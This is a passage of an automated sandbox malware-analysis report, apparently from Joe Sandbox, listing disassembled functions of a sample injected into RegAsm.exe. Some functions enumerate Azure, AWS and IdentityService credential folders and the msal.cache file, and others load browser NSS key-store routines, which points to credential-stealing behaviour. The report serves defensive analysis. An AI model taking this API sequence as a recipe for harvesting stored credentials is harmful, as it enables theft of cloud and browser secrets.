                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                • API String ID: 3756394533-2552752316
                                                                                • Opcode ID: c4fbf8ae288189fadde695e6e3e0d63c2b94dee8dca2dd14a73f0bfbed76cc4c
                                                                                • Instruction ID: 10500b743f269def70dd6b7fdc9c6fc8078618973e84e8fc8226200c572f9876
                                                                                • Opcode Fuzzy Hash: c4fbf8ae288189fadde695e6e3e0d63c2b94dee8dca2dd14a73f0bfbed76cc4c
                                                                                • Instruction Fuzzy Hash: DD4190B1A001566BD7135F189C416BB3E69AF9634CF0A4134EC2D5B702E736E865CBE3
                                                                                Function 00416791 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 135stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00416796
                                                                                • memset.MSVCRT ref: 004167B6
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004167DC
                                                                                • lstrcat.KERNEL32(?,\.azure\), ref: 004167F9
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                  • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                  • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                  • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                  • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                • memset.MSVCRT ref: 00416834
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0041685F
                                                                                • lstrcat.KERNEL32(?,\.aws\), ref: 0041687C
                                                                                  • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                • memset.MSVCRT ref: 004168B7
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004168E2
                                                                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004168FF
                                                                                  • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                  • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                • memset.MSVCRT ref: 0041693A
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                • API String ID: 2836893066-974132213
                                                                                • Opcode ID: eafab93a85b15da5a9038299b0ffd7d14768dd6955e4ef185d28edb705030bdc
                                                                                • Instruction ID: bee94e7e3baf3fafe0f6379a1f42c20d34aa1a64c6f182653504fcfef76d90c4
                                                                                • Opcode Fuzzy Hash: eafab93a85b15da5a9038299b0ffd7d14768dd6955e4ef185d28edb705030bdc
                                                                                • Instruction Fuzzy Hash: DC41A6B1D0022CBADB11EBE4DC46EEE7B7CAB1C304F40456FB554A3182DA7C97888B65
                                                                                Function 6C912D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C912DEC
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C912E00
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C912E2B
                                                                                • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C912E43
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C,?,-00000001,00000000,?), ref: 6C912E74
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C8E4F1C,?,-00000001,00000000), ref: 6C912E88
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C912EC6
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C912EE4
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C912EF8
                                                                                • PR_Unlock.NSS3(?), ref: 6C912F62
                                                                                • TlsGetValue.KERNEL32 ref: 6C912F86
                                                                                • EnterCriticalSection.KERNEL32(0000001C), ref: 6C912F9E
                                                                                • PR_Unlock.NSS3(?), ref: 6C912FCA
                                                                                • TlsGetValue.KERNEL32 ref: 6C91301A
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C91302E
                                                                                • PR_Unlock.NSS3(?), ref: 6C913066
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C913085
                                                                                • PR_Unlock.NSS3(?), ref: 6C9130EC
                                                                                • TlsGetValue.KERNEL32 ref: 6C91310C
                                                                                • EnterCriticalSection.KERNEL32(0000001C), ref: 6C913124
                                                                                • PR_Unlock.NSS3(?), ref: 6C91314C
                                                                                  • Part of subcall function 6C8F9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C92379E,?,6C8F9568,00000000,?,6C92379E,?,00000001,?), ref: 6C8F918D
                                                                                  • Part of subcall function 6C8F9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C92379E,?,6C8F9568,00000000,?,6C92379E,?,00000001,?), ref: 6C8F91A0
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07AD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07CD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07D6
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C85204A), ref: 6C8C07E4
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,6C85204A), ref: 6C8C0864
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C8C0880
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,6C85204A), ref: 6C8C08CB
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08D7
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08FB
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C91316D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                • String ID:
                                                                                • API String ID: 3383223490-0
                                                                                • Opcode ID: 3199c2c111397bcd9a16487b7b620f6df30565596dcb884ea27376287969780e
                                                                                • Instruction ID: 46fedd749b0c4bc49ff42f3540c55474c10765cd5c7f58d2e8528a5e6279b589
                                                                                • Opcode Fuzzy Hash: 3199c2c111397bcd9a16487b7b620f6df30565596dcb884ea27376287969780e
                                                                                • Instruction Fuzzy Hash: BCF1D1B1E046099FEF10EF64D845B9DBBB8BF0A318F144168EC04A7B11E735E995CB91
                                                                                Function 6C916CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C916943
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C916957
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C916972
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C916983
                                                                                  • Part of subcall function 6C916910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C9169AA
                                                                                  • Part of subcall function 6C916910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C9169BE
                                                                                  • Part of subcall function 6C916910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C9169D2
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C9169DF
                                                                                  • Part of subcall function 6C916910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C916A5B
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C916D8C
                                                                                • free.MOZGLUE(00000000), ref: 6C916DC5
                                                                                • free.MOZGLUE(?), ref: 6C916DD6
                                                                                • free.MOZGLUE(?), ref: 6C916DE7
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C916E1F
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C916E4B
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C916E72
                                                                                • free.MOZGLUE(?), ref: 6C916EA7
                                                                                • free.MOZGLUE(?), ref: 6C916EC4
                                                                                • free.MOZGLUE(?), ref: 6C916ED5
                                                                                • free.MOZGLUE(00000000), ref: 6C916EE3
                                                                                • free.MOZGLUE(?), ref: 6C916EF4
                                                                                • free.MOZGLUE(?), ref: 6C916F08
                                                                                • free.MOZGLUE(00000000), ref: 6C916F35
                                                                                • free.MOZGLUE(?), ref: 6C916F44
                                                                                • free.MOZGLUE(?), ref: 6C916F5B
                                                                                • free.MOZGLUE(00000000), ref: 6C916F65
                                                                                  • Part of subcall function 6C916C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C91781D,00000000,6C90BE2C,?,6C916B1D,?,?,?,?,00000000,00000000,6C91781D), ref: 6C916C40
                                                                                  • Part of subcall function 6C916C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C91781D,?,6C90BE2C,?), ref: 6C916C58
                                                                                  • Part of subcall function 6C916C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C91781D), ref: 6C916C6F
                                                                                  • Part of subcall function 6C916C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C916C84
                                                                                  • Part of subcall function 6C916C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C916C96
                                                                                  • Part of subcall function 6C916C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C916CAA
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C916F90
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C916FC5
                                                                                • PK11_GetInternalKeySlot.NSS3 ref: 6C916FF4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                • String ID:
                                                                                • API String ID: 1304971872-0
                                                                                • Opcode ID: 5eebbda156581c1abe18d49f17e2ae13e257a258f14a77f668166ce4a484276a
                                                                                • Instruction ID: a3fb8c28840267bfc74294ebbde1a1ae054173da359c5fbb81b61e94d6e92e41
                                                                                • Opcode Fuzzy Hash: 5eebbda156581c1abe18d49f17e2ae13e257a258f14a77f668166ce4a484276a
                                                                                • Instruction Fuzzy Hash: 64B172B5E0921D9FEF00CBA5D946B9E7BB9EF09348F140124E815E7E00E735E925CBA1
                                                                                Function 6C914C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6C914C4C
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C914C60
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914CA1
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C914CBE
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914CD2
                                                                                • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C914D3A
                                                                                • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C914D4F
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914DB7
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07AD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07CD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07D6
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C85204A), ref: 6C8C07E4
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,6C85204A), ref: 6C8C0864
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C8C0880
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,6C85204A), ref: 6C8C08CB
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08D7
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08FB
                                                                                • TlsGetValue.KERNEL32 ref: 6C914DD7
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C914DEC
                                                                                • PR_Unlock.NSS3(?), ref: 6C914E1B
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C914E2F
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C914E5A
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C914E71
                                                                                • free.MOZGLUE(00000000), ref: 6C914E7A
                                                                                • PR_Unlock.NSS3(?), ref: 6C914EA2
                                                                                • TlsGetValue.KERNEL32 ref: 6C914EC1
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C914ED6
                                                                                • PR_Unlock.NSS3(?), ref: 6C914F01
                                                                                • free.MOZGLUE(00000000), ref: 6C914F2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                • String ID:
                                                                                • API String ID: 759471828-0
                                                                                • Opcode ID: 9bf6343da8e5f3c285d4bb07b7c3cea9d9543a61934f56e1598f0437e510aae0
                                                                                • Instruction ID: 33e5f914997f13a89f4f1b947534dff511a239e7fc9ad4eafead0270e20ee22e
                                                                                • Opcode Fuzzy Hash: 9bf6343da8e5f3c285d4bb07b7c3cea9d9543a61934f56e1598f0437e510aae0
                                                                                • Instruction Fuzzy Hash: A0B1F075A0420A9FEF10DF68D846AAA77B8BF0A31CF048124ED1597F00E739E965CF91
                                                                                Function 6C966E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C966BF7), ref: 6C966EB6
                                                                                  • Part of subcall function 6C8C1240: TlsGetValue.KERNEL32(00000040,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C1267
                                                                                  • Part of subcall function 6C8C1240: EnterCriticalSection.KERNEL32(?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C127C
                                                                                  • Part of subcall function 6C8C1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C1291
                                                                                  • Part of subcall function 6C8C1240: PR_Unlock.NSS3(?,?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C12A0
                                                                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CA0FC0A,6C966BF7), ref: 6C966ECD
                                                                                • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C966EE0
                                                                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C966EFC
                                                                                • PR_NewLock.NSS3 ref: 6C966F04
                                                                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C966F18
                                                                                • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C966BF7), ref: 6C966F30
                                                                                • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C966BF7), ref: 6C966F54
                                                                                • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C966BF7), ref: 6C966FE0
                                                                                • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C966BF7), ref: 6C966FFD
                                                                                Strings
                                                                                • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C966FDB
                                                                                • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C966F4F
                                                                                • SSLKEYLOGFILE, xrefs: 6C966EB1
                                                                                • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C966EF7
                                                                                • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C966FF8
                                                                                • SSLFORCELOCKS, xrefs: 6C966F2B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                • API String ID: 412497378-2352201381
                                                                                • Opcode ID: 9d57b1c002869335f9816d19ea18b42f50a23920097b79b3e489950365045965
                                                                                • Instruction ID: 62ece9db6a5a2a1f14e56091ed18502c3cb3944d0dab17b222b061122cd4fc3e
                                                                                • Opcode Fuzzy Hash: 9d57b1c002869335f9816d19ea18b42f50a23920097b79b3e489950365045965
                                                                                • Instruction Fuzzy Hash: 6BA17BB2B59A818BF724463EEC1074433E9AB933AAF588365E834C7ED8DB35D481C341
                                                                                Function 6C906D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_Digest), ref: 6C906D86
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C906DB4
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C906DC3
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C906DD9
                                                                                • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C906DFA
                                                                                • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C906E13
                                                                                • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C906E2C
                                                                                • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C906E47
                                                                                • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C906EB9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                                                • API String ID: 1003633598-2270781106
                                                                                • Opcode ID: c604560b580185c15357dd319d304a28fcaca2e529212d8b1919fedfe65899c1
                                                                                • Instruction ID: 41e8fd722815a18a4886810cc9757d5d0f48bc473284d2b5328b07201cdd36f2
                                                                                • Opcode Fuzzy Hash: c604560b580185c15357dd319d304a28fcaca2e529212d8b1919fedfe65899c1
                                                                                • Instruction Fuzzy Hash: 5E41E235701205AFDB159F54DD58B8A7BB5AFB671CF048028E80CD7A12DB30D89ADBD2
                                                                                Function 00411CD8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00411CDD
                                                                                • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                • ExitProcess.KERNEL32 ref: 00411D0A
                                                                                • strtok_s.MSVCRT ref: 00411D21
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
